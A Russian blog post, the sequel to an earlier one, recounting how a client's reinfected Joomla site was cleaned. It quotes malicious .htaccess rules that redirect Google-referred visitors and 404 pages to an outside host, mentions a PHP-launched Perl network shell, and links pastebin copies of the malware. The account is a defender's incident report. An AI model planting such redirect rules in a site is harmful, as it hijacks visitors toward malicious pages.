О любви-2

Недавно я писал про проблему с заражением одного жумло-сайта http://kartz.ru/2012/02/09/web-worm-love/

Как нам уже стало понятно из той статьи, капитан Врунгель просто жить не может без приключений. Поэтому, по многочисленным просьбам детишек, публикуем продолжение правдивой истории. Тем более, что продолжение есть.

Но сначала немного дополним первую часть рассказа подробностями.

Зачем нужно было переносить сайт с первоначального сервера?
1. Было опасение, что там он опять зачервивеет. (оно оправдалось наихудшим способом)
2. При попытке залить туда вылеченный файл фтп-сервер сообщал об исчерпании дисковой квоты.
3. Сервер был был хз где и одминил его то ли урод с Урала, то ли мудак из Самары (заказчик расходился в показаниях или был слаб в географии).
4. На переносе настаивал заказчик.

Ещё ещё была проблема с тем, что при распаковке бэкапа тамошний админ напрочь потерял информацию о правах доступа и времени модификации фпйлов, то есть они были все 0777 и созданы одновременно. Видимо, он использовал зип-архив и винду, а распаковывал всё через жопу. То есть использовать наиболее очевидный способ – контроль и анализ недавно изменённых файлов – не помогал. Более того, пойманный код после модификации возвращал права на место.
??так, предыдущая часть вроде бы имела счастливый конец – всё работало. Но не так быстро…

Если читатель помнит, для изоляции больного сайта и для обеспечения карантина был арендован новый сервер. Далее будет понятно, что это было более чем благоразумно. Однако, оплачивать даже треть стоимости этого сервера (2500р в год) заказчик отказался. (Я думал со временем подселить туда ещё кого-то). Он утверждал, что сайт не приносит и 6000р дохода в год, хотя до этого говорил, что платит около 1000р в неделю за яндекс-директ и они отбиваются с выгодой. Я не особо огорчился и послал его искать хостинг дешевле. Архив с файлами и дампом базы у него был.

Тогда я стал припоминать, что от своего старого хостера он хотел уйти, потому что тот просил с него 900р за хостинг.

Через пару дней он написал, что передумал и готов оплатить треть сервера, но мне это было уже неинтересно.

Дело в том, была неявная договорённость, что мои услуги по лечению и переносу будут компенсированы бартером. Заказчик согласился, попросив срок в 10 дней. В течение месяца он не выполнил своих обещаний, хотя там заказ был на 40 рублей (себестоимостью ещё меньше, получается). При напоминании он возмутился, что должен оплачивать это «из своего дырявого кармана». Что я уже потратил на сервер в 200 раз больше, его не смутило.

На этом вопрос с переездом был решён окончательно. Я не торопился удалять сайт с сервера, но обозначил временные рамки, когда это будет сделано. Я не хотел, чтобы сайт выпал из индекса. Да и тупо лень было лезть на сервер удалять хост. (Практика показала, что из индекса он всё равно выпадет безо всяких стараний с моей стороны).

Но пару дней назад он мне предъявил, что я опять заразил сайт какой-то неведомой хернёй. Вместо страниц там был какой-то wndoctor. Я, разумеется, ничего не заражал, и не особо торопился разбираться, но так получилось, что я как раз сидел простуженый и заниматься чем-то серьёзным не получалось. Полез посмотреть.

Сперва случайно обнаружил ещё зашифрованный кусок вредоноса, который обращается на какие-то сайты за командами.

Потом нашёл источник проблемы с редиректом:
ErrorDocument 404 http://wndoc
RewriteCond %{HTTP_REFERER} .*google.*
RewriteRule ^(.*)$ http://wndoc [R=301,L]

Потом по времени создания этого чуда и логам нашёл третий кусок вредоноса. ??м оказался зашифрованный скрипт на пхп, который создаёт запускает скрипт на перле. Скрипт на перле – типа обычного телнет сервера, сетевой шелл.

(Я кстати иногда посматриваю логи – и в упор не понимаю тех, кто держит phpmyadmin по стандартному пути или пользуется устаревшей уязвимой версией phpmyadmin. Обращений по этому адресу очень много, и они не к добру, я думаю…).

Также нашёл в папке с картинками ещё много интересного и вредного – всего 5 червей. ?? нет никакой уверенности, что на этом они закончились.

Вот фрагменты зловредов:
pastebin.com/mrugRc5t
pastebin.com/M3eNERp7
pastebin.mozilla-russia.org/109843
вот второй pastebin.mozilla-russia.org/109844
третья часть вируса pastebin.mozilla-russia.org/109846
5-30 4я часть pastebin.mozilla-russia.org/109848 самая опасная
5я часть pastebin.mozilla-russia.org/109849

Тогда я уже грохнул этот вхост и просмотрел на сервере файлы по времени модификации. Вроде ничего такого не нашёл. Бинарник перла я убрал на всякий случай. Сообщил, что у него там полно заразы и будет разумно создавать сайт с нуля на новой незаражённом хостинге.

Сейчас он перенёс старый сайт на новый хостинг и пишет письма, в которых задаёт вопросы, на которые я давно ответил. Я, конечно, не отвечаю: занят Клинпедией. Судя по адресам перенаправлений, у ему через шелл каждый день заражают сайт чем-то новым.